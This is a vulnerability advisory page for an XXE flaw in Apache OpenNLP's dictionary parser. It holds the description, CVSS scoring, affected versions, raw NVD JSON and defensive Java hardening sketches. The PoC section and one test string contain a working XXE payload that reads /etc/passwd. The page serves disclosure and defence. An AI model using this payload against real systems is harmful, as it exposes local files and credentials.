Security Vulnerability Report
CVE-2026-40682 CVSS 9.1 CRITICAL

Published: 2026-05-04 17:16:24
Last Modified: 2026-05-06 18:00:50

Description

XML External Entity (XXE) via Unsanitized Dictionary Parsing in Apache OpenNLP DictionaryEntryPersistor

Versions Affected: before 2.5.9, before 3.0.0-M3

Description: The DictionaryEntryPersistor class initializes a static SAXParserFactory at class-load time without enabling FEATURE_SECURE_PROCESSING or disabling DTD processing. When create(InputStream, EntryInserter) is invoked, the only feature set on the XMLReader is namespace support; external entity resolution and DOCTYPE declarations remain fully enabled. An attacker who can supply a crafted dictionary file (e.g., a stop-word list or domain dictionary) containing a malicious DOCTYPE declaration can trigger local file disclosure via file:// entity references or server-side request forgery via http:// entity references during SAX parsing, before the application processes a single dictionary entry.

This is inconsistent with the project's own XmlUtil.createSaxParser() helper, which correctly sets FEATURE_SECURE_PROCESSING and disallow-doctype-decl and is used by all other XML parsing paths in the codebase. The public Dictionary(InputStream) constructor delegates directly to this method and is the documented API for loading user-supplied dictionaries, making untrusted input a realistic scenario.

Mitigation: 2.x users should upgrade to 2.5.9. 3.x users should upgrade to 3.0.0-M3. Users who cannot upgrade immediately should ensure that all dictionary files are sourced from trusted origins and should consider wrapping the Dictionary(InputStream) constructor with input validation that rejects any XML containing a DOCTYPE declaration before it reaches the parser.
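
The hardening that the description attributes to XmlUtil.createSaxParser() can be sketched with JDK classes alone. This is not the OpenNLP source: the class HardenedSaxSketch and its methods are hypothetical names chosen for illustration, and the sample documents reuse the element names from the PoC on this page. The sketch assumes the JDK's built-in SAX implementation, which recognizes the Xerces disallow-doctype-decl feature.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

// Hypothetical illustration class; not part of Apache OpenNLP.
final class HardenedSaxSketch {

    // Xerces feature id that turns any DOCTYPE declaration into a fatal error.
    static final String DISALLOW_DOCTYPE =
            "http://apache.org/xml/features/disallow-doctype-decl";

    // Builds a parser with the two settings the advisory says were missing.
    static SAXParser newHardenedParser() {
        try {
            SAXParserFactory factory = SAXParserFactory.newInstance();
            factory.setNamespaceAware(true);
            factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            factory.setFeature(DISALLOW_DOCTYPE, true);
            return factory.newSAXParser();
        } catch (ParserConfigurationException | SAXException e) {
            // Fail closed: never fall back to an unhardened parser.
            throw new IllegalStateException("XML parser could not be hardened", e);
        }
    }

    // Returns true if the hardened parser reads the document without error.
    static boolean accepts(String xml) {
        try {
            newHardenedParser().parse(
                    new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)),
                    new DefaultHandler());
            return true;
        } catch (SAXException e) {
            return false; // DOCTYPE present or document malformed
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        String clean = "<dictionary><entry><word>the</word></entry></dictionary>";
        String hostile = "<!DOCTYPE data [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>"
                + "<dictionary><entry><word>&xxe;</word></entry></dictionary>";
        System.out.println("clean accepted:   " + accepts(clean));
        System.out.println("hostile accepted: " + accepts(hostile));
    }
}
```

Because the DOCTYPE declaration is rejected as soon as it is read, the parser should never reach the point of resolving the file:// entity.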

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
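
The 9.1 base score can be reproduced from the vector by hand. The sketch below applies the CVSS v3.1 base-score formula for the Scope: Unchanged case, with metric weights taken from the CVSS v3.1 specification (AV:N = 0.85, AC:L = 0.77, PR:N = 0.85, UI:N = 0.85, C:H = I:H = 0.56, A:N = 0). The class and method names are hypothetical, and the sketch does not parse vector strings or handle Scope: Changed.

```java
// Hypothetical illustration class: CVSS v3.1 base score, Scope: Unchanged only.
final class Cvss31BaseScoreSketch {

    // "Roundup" as defined in the CVSS v3.1 specification: smallest value with
    // one decimal place that is >= the input, computed on scaled integers to
    // avoid floating-point artifacts.
    static double roundUp(double value) {
        long scaled = Math.round(value * 100000);
        if (scaled % 10000 == 0) {
            return scaled / 100000.0;
        }
        return (Math.floor(scaled / 10000.0) + 1) / 10.0;
    }

    // Impact sub-score for Scope: Unchanged.
    static double impact(double c, double i, double a) {
        double iss = 1 - (1 - c) * (1 - i) * (1 - a);
        return 6.42 * iss;
    }

    // Exploitability sub-score.
    static double exploitability(double av, double ac, double pr, double ui) {
        return 8.22 * av * ac * pr * ui;
    }

    static double baseScore(double av, double ac, double pr, double ui,
                            double c, double i, double a) {
        double imp = impact(c, i, a);
        if (imp <= 0) {
            return 0.0;
        }
        return roundUp(Math.min(imp + exploitability(av, ac, pr, ui), 10.0));
    }

    public static void main(String[] args) {
        // AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
        double score = baseScore(0.85, 0.77, 0.85, 0.85, 0.56, 0.56, 0.0);
        System.out.println("base score = " + score);
    }
}
```

With these weights the impact sub-score is about 5.18 and the exploitability sub-score about 3.89, consistent with the impactScore of 5.2 and exploitabilityScore of 3.9 in the raw JSON; their sum, about 9.06, rounds up to 9.1.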

Configurations (Affected Products)

cpe:2.3:a:apache:opennlp:*:*:*:*:*:*:*:* (versions before 2.5.9) - VULNERABLE
cpe:2.3:a:apache:opennlp:3.0.0:m1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:apache:opennlp:3.0.0:m2:*:*:*:*:*:* - VULNERABLE
Apache OpenNLP < 2.5.9
Apache OpenNLP < 3.0.0-M3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- Malicious dictionary file crafted by attacker -->
<!DOCTYPE data [
  <!-- Define an entity to read a local file (e.g., /etc/passwd) -->
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<dictionary>
  <entry>
    <!-- The entity is resolved during parsing, leaking file content -->
    <word>&xxe;</word>
  </entry>
</dictionary>
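
For users who cannot upgrade, the mitigation of rejecting any DOCTYPE before the dictionary parser sees the input might look like the following sketch. It buffers the stream, pre-parses it with a parser that forbids DOCTYPE declarations, and only then returns a fresh stream over the same bytes. DoctypeGuard and rejectDoctype are hypothetical names, not OpenNLP APIs; the sketch assumes the dictionary fits in memory and that the JDK's built-in SAX parser is in use.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.UncheckedIOException;
import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

// Hypothetical pre-validation wrapper; not part of Apache OpenNLP.
final class DoctypeGuard {

    private static final String DISALLOW_DOCTYPE =
            "http://apache.org/xml/features/disallow-doctype-decl";

    // Returns a re-readable copy of the input, or throws
    // IllegalArgumentException if the XML declares a DOCTYPE or is malformed.
    static InputStream rejectDoctype(InputStream untrusted) {
        try {
            byte[] bytes = untrusted.readAllBytes();
            SAXParserFactory factory = SAXParserFactory.newInstance();
            factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            factory.setFeature(DISALLOW_DOCTYPE, true);
            // The no-op handler discards content; only acceptance matters here.
            factory.newSAXParser().parse(new ByteArrayInputStream(bytes), new DefaultHandler());
            return new ByteArrayInputStream(bytes);
        } catch (SAXException | ParserConfigurationException e) {
            // Fail closed on a DOCTYPE, malformed XML, or an unhardenable parser.
            throw new IllegalArgumentException(
                    "Dictionary rejected: DOCTYPE present, XML malformed, or parser not hardened", e);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }
}
```

A caller would then pass the validated stream on, for example new Dictionary(DoctypeGuard.rejectDoctype(in)), using the Dictionary(InputStream) constructor named in the description. The input is parsed twice, which trades some load time for keeping the check independent of the vulnerable code path.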

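References

https://lists.apache.org/thread/r6jpt0qr9nj67gqhppqg7jxf8vsbo0w6 (Mailing List, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2026/05/01/19 (Mailing List, Third Party Advisory)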

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40682", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:23.657", "lastModified": "2026-05-06T18:00:49.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XML External Entity (XXE) via Unsanitized Dictionary Parsing in Apache OpenNLP DictionaryEntryPersistor\n\n\nVersions Affected: before 2.5.9, before 3.0.0-M3\n\n\nDescription: The DictionaryEntryPersistor class initializes a static SAXParserFactory at class-load time without enabling FEATURE_SECURE_PROCESSING or disabling DTD processing. When create(InputStream, EntryInserter) is invoked, the only feature set on the XMLReader is namespace support \u2014 external entity resolution and DOCTYPE declarations remain fully enabled. An attacker who can supply a crafted dictionary file (e.g., a stop-word list or domain dictionary) containing a malicious DOCTYPE declaration can trigger local file disclosure via file:// entity references or server-side request forgery via http:// entity references during SAX parsing, before the application processes a single dictionary entry. This is inconsistent with the project's own XmlUtil.createSaxParser() helper, which correctly sets FEATURE_SECURE_PROCESSING and disallow-doctype-decl and is used by all other XML parsing paths in the codebase. The public Dictionary(InputStream) constructor delegates directly to this method and is the documented API for loading user-supplied dictionaries, making untrusted input a realistic scenario.\n\n\nMitigation: 2.x users should upgrade to 2.5.9. 3.x users should upgrade to 3.0.0-M3. Users who cannot upgrade immediately should ensure that all dictionary files are sourced from trusted origins and should consider wrapping the Dictionary(InputStream) constructor with input validation that rejects any XML containing a DOCTYPE declaration before it reaches the parser."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:opennlp:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.5.9", "matchCriteriaId": "3E73109B-BF5E-4832-B5DC-1747D3C42287"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:opennlp:3.0.0:m1:*:*:*:*:*:*", "matchCriteriaId": "57E14048-91DB-4673-9A7B-B15675B3994A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:opennlp:3.0.0:m2:*:*:*:*:*:*", "matchCriteriaId": "2E738486-C0BD-4FDB-8880-DBC2BA4C0D77"}]}]}], "references": [{"url": "https://lists.apache.org/thread/r6jpt0qr9nj67gqhppqg7jxf8vsbo0w6", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/01/19", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}